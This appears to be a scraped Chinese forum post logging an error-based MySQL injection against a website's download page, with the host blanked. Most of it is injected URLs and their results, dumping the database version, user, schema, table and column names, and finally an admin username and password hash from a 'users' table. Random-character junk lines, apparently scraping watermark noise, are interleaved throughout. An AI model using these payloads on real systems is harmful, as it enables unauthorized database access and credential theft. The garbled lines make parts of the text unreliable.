http://www.wooyun.org/bugs/wooyun-2010-01666
) d# p2 ~# ]8 o0 Z9 g. @6 O
* T. Y$ D8 q& D9 Y0 N8 l之前想找个测试 没想到这有 可以测试下做个记录而已
4 F# r; I, L* Q: p% R% \+ b s) f* Q5 E1 G4 m* P% P9 {' P
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003% D: ]$ Z" _$ }) z
' \4 W7 o6 _ Q/ k. g/ Z9 ^ X" o+ q
/data0/htdocs/leqi_new/app/myapp.php
* ^( N# Y/ _. E3 p {7 o8 R7 P, I3 T6 q' @+ E/ Q6 U8 ~
或者- u, ]& m' Q# s; S+ L! }4 S" b
% n6 o9 a, {/ J
/**********version()**********/ 5.1.49-log
D( a& o( B5 W8 ]0 lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* A! {6 r& F" y/ B/ o% }1 Z" M; E2 v( J! n! z
/**********user()**********/ $ w# a2 K! [8 ?! a' F/ Z, m
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* z" K" V+ ^ y. t& ^. |" a2 N/ C; H4 f
/**********database()**********/ leqi4 L+ R7 Q# @6 O
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0035 H7 C l; V1 {% ^+ T$ w& D. q
4 ^. s0 i3 K$ D/**********limit依次递归爆库**********/" G. A# V* p7 O3 C4 _* x" Q% i) e" H
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: Y4 N% k0 u# o- _" jinformation_schema/ h- X' M1 T% e. I" a
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0038 u( G" R- b4 {3 b1 `6 @& c# R
leqi
8 J' q S9 U. ?. D) l- Ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 g: g) E' ]0 I4 [7 L/ f S* C( jtest
2 n' z: d! z$ P( }' {; {5 e$ c4 [1 j. Q
/**********limit依次递归爆表名**********/
+ d8 ~+ G& S- U, P1 _! k- P% Hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 \7 c/ ?+ ^5 u: S/ J# Nusers5 h- u; P5 M( y0 I% _1 h
# Z5 ~4 d e! `- D7 b+ ]/**********limit依次递归爆字段名**********/, N( D$ Q+ ]4 H8 v$ \
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003" ?; c0 |5 q' c" z$ b* C5 b) T
user_id,username,nickname,passwd,group_id, y' m& ~) V) r2 l# q* k! g' o& q
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23) h; [ j- P+ i d3 j# ^" [
/wapc/5000_0005_003
: H, q, C( j9 G9 i) {. {9 p11 21! ]9 Y- h& o4 }% A6 g$ j
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
% A% C3 ?; E, P3 N( x/wapc/5000_0005_003* [, k. ^3 d2 J& {+ P9 j2 z' U! _
11 341 351 361
* [: g1 F8 d. o. b7 o/**********爆数据**********/
1 c) k6 j. F) U' ~/ i; Fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
4 E" h/ M$ ^+ zadmin# \- ^+ P! h, f- B8 A3 X
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%233 [, p9 M6 ] Q1 Z7 j, D
6a8b4574ca231eb8bd52764d4978ffcd7 n1 Q) i5 J d4 P
$ e2 u9 ~6 r/ T3 `3 N$ q
; e }6 q, g' N7 y' X7 u
|